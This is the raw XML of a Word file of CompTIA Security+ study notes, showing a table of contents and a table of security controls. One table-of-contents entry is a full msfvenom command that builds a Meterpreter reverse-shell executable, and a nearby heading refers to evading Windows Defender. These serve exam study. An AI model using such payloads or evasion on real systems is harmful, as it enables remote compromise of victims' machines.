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03878" w14:textId="3EEDC982" w:rsidR="00B120D1" w:rsidRPr="0059129E" w:rsidRDefault="00C05AC8" w:rsidP="0059129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9129E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CompTIA Security+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558521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57F1A8" w14:textId="38B4F199" w:rsidR="00F272EB" w:rsidRPr="005B4891" w:rsidRDefault="00F272EB">
          <w:pPr>
            <w:pStyle w:val="Overskriftforinnholdsfortegnelse"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005B4891">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>Innhold</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3A11FE08" w14:textId="7B558B36" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="00F272EB">
          <w:pPr>
            <w:pStyle w:val="INNH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r w:rsidRPr="002E3A9B">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="002E3A9B">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="002E3A9B">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc198019355" w:history="1">
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>General security concepts</w:t>
            </w:r>
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc198019355 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002E3A9B" w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="002E3A9B"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F4B5524" w14:textId="75664665" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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56" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Authentication Factors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56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3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0E36EB" w14:textId="0EFD7BC9" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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57" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IAAA = Identity, Authentication, Authorization and Accounting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57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4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45DC458" w14:textId="686BF228" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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58" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Physical Security foundations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58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4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C4217D2" w14:textId="7BD01F89" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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59" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Security Operations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59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5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E98A171" w14:textId="7DB746E2" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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60" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Digital certificates and signatures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60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8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7630D6" w14:textId="24D2368F" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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61" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Symmetric and asymmetric encryption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61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9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3C51D7" w14:textId="4B5EF1C5" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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62" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Common SQLi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62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11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21C859D" w14:textId="268FD1F8" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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63" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Metasploit framework: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63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13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B3EB013" w14:textId="5C426BB9" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH3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64" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>msfvenom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64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13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F5B327" w14:textId="596B77DB" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH3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65" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe &gt; payload.exe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65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13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E6A861" w14:textId="60F9AD2A" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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66" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Avoid windows defender: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66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13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5D6301B" w14:textId="5231037A" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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67" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>XSS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67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14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50075B8" w14:textId="5F344DDB" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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68" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Troubleshooting TCP etc.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68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15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B0F2A0" w14:textId="489F680F" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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69" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Port Security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69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16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58DBB5" w14:textId="198CE946" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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70" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Mobile devices: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70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17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3F1AB10" w14:textId="1551A778" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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71" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Monitoring and alerting vulnerabilities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71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19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93C4566" w14:textId="6D579738" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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72" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Firewall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72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20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83F49EB" w14:textId="13571106" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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73" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operating system security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73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21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F03C3D8" w14:textId="62D84B33" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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74" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Identity and Access Management (IAM)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74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23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E7CF888" w14:textId="54E5DAAB" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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75" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Privileged Identity Management (PIM)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75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23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B5742AF" w14:textId="409E66E5" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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76" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Automation and Scripting uses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76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24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DA62624" w14:textId="0D8EFE7D" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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77" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Standards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77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25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A120281" w14:textId="1A35D8B2" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH2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78" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Other standards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78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25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F6D706" w14:textId="739CB10F" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH2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79" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procedures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79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25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A3B196" w14:textId="4E3E556D" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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80" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Risk Analysis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80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25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1E08802" w14:textId="6580F897" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="002E3A9B">
          <w:pPr>
            <w:pStyle w:val="INNH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val="nb-NO" w:eastAsia="nb-NO"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc198019381" w:history="1">
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:rStyle w:val="Hyperkobling"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Agreements</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc198019381 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="002E3A9B">
              <w:rPr>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidRPr="002E3A9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56AD07" w14:textId="3DCE7743" w:rsidR="002E3A9B" w:rsidRPr="002E3A9B" w:rsidRDefault="00F272EB" w:rsidP="002E3A9B">
          <w:r w:rsidRPr="002E3A9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EEAD13B" w14:textId="77777777" w:rsidR="002E3A9B" w:rsidRDefault="002E3A9B" w:rsidP="002E3A9B"/>
    <w:p w14:paraId="63246786" w14:textId="77777777" w:rsidR="002E3A9B" w:rsidRDefault="002E3A9B" w:rsidP="002E3A9B"/>
    <w:p w14:paraId="01A96B33" w14:textId="2661BF0B" w:rsidR="00E164AE" w:rsidRPr="00A05553" w:rsidRDefault="00E164AE" w:rsidP="00AD44AF">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc198019355"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>General security concepts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2B294E32" w14:textId="09A21841" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="00C05AC8">
      <w:pPr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Categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F87249" w14:textId="5B822744" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="00C05AC8">
      <w:pPr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Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A878164" w14:textId="411FC4DB" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="00C05AC8">
      <w:pPr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Risk assessment and management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A6E99" w14:textId="6904FEE3" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="00C05AC8">
      <w:pPr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Patch management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495EB39" w14:textId="57E6AB18" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="00C05AC8">
      <w:pPr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Reducing</w:t>
      </w:r>
      <w:r w:rsidR="00386741" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack surfac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05AC8" w:rsidRPr="005B4891" w14:paraId="0D6D3DF2" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3301BA0B" w14:textId="77777777" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="005209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14:paraId="644B0F10" w14:textId="0C1A2A0D" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="005209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B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Security Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E8DB533" w14:textId="77777777" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="005209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AC8" w:rsidRPr="005B4891" w14:paraId="77D3E080" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32EE2D47" w14:textId="64644B8F" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Technical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="764BD7C1" w14:textId="6B462BD3" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Administrative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56A0F495" w14:textId="19A04524" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="005209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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05AC8" w:rsidRPr="005B4891" w14:paraId="2EA0B7C1" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16588FAE" w14:textId="398CB90C" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E8CBF61" w14:textId="7C701CC7" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5896DCC8" w14:textId="40488432" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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Fences</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05AC8" w:rsidRPr="005B4891" w14:paraId="01093653" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66B62B72" w14:textId="432E9C77" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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Anti-virus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75ADA76D" w14:textId="21FE5897" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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Procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21FCF9D5" w14:textId="3C540807" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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Cameras</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05AC8" w:rsidRPr="005B4891" w14:paraId="7B556B70" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5975CEBD" w14:textId="30CFEC3F" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17891888" w14:textId="1CAF2E91" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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IRP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="017EDF9E" w14:textId="6EEA22C5" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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Gates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05AC8" w:rsidRPr="005B4891" w14:paraId="1B661EB5" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="282EEC93" w14:textId="19B7DCC5" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00C05AC8" w:rsidP="0052096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IDS/IPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B3690CE" w14:textId="0C956927" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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BCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="675DFAA9" w14:textId="385099BC" w:rsidR="00C05AC8" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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Guards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E164AE" w:rsidRPr="005B4891" w14:paraId="5903B227" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59A3E8AF" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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14:paraId="00226708" w14:textId="5BE6359A" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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Data classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42D74F22" w14:textId="77777777" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="0052096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36F0BC0" w14:textId="1AE7CC3E" w:rsidR="00E164AE" w:rsidRPr="005B4891" w:rsidRDefault="00E164AE" w:rsidP="00C05AC8">
      <w:pPr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Types == Goals / Function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06"/>
        <w:gridCol w:w="1176"/>
        <w:gridCol w:w="1176"/>
        <w:gridCol w:w="1239"/>
        <w:gridCol w:w="1605"/>
        <w:gridCol w:w="1183"/>
        <w:gridCol w:w="1277"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA6AE0" w:rsidRPr="005B4891" w14:paraId="300F07A4" w14:textId="77777777" w:rsidTr="00520960">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1406" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
